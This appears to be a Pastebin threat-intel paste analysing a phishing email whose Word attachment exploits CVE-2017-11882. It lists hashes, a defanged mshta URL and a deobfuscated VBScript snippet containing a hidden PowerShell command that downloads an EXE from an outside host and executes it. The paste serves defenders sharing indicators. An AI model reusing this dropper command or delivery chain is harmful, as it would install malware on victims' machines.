Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- SENDER:
- khalidmc@alkoutprojects.com
- SUBJECT:
- RFQ: 9607 (NEW ORDER)
- ATTACHMENT:
- RFQ 9607 (NEW ORDER).doc
- 1e268f16aa9af3c387ca676df85dd75d
- 3cd2654d9d51257b4961f93a44b0510b9639b81ab6677da1414305c02390a3f5
- (attachment exploits CVE-2017-11882, uses mshta bypass method to DL, run VBScript)
- mshta hxxps://d.pr/lWjMRa/d.pr
- HTA EXECUTED VIA MSHTA:
- d.pr
- 458cfb92a4527a53bb4b9a5d739f206f
- 0a6b8c9ed83385b73628fb9854e387b2d75c5be34fc5f093c0aa61f0814c9620
- DEOBFUSCATED VBSCRIPT SNIPPET:
- "powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -command try{$down = New-Object System.Net.WebClient;$url = 'HTTPS:/'+'/'+'d.pr/4Fa51z/d.pr';$file = $env:temp + '\\d.exe';$down.DownloadFile($url,$file);$exec = New-Object -com shell.application;$exec.shellexecute($file);}catch{}exit;"
- HTTP REQUEST:
- https://d.pr/4Fa51z/d.pr
- EXE DROPPED:
- d.pr (EXE)
- b6ba8e4bfa739772d2bbcc965309fc50
- 8f6bbfce551283f44a1263246f3c633bfbb9d60520a5543d36ad94fc8e7736bf
- ....
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
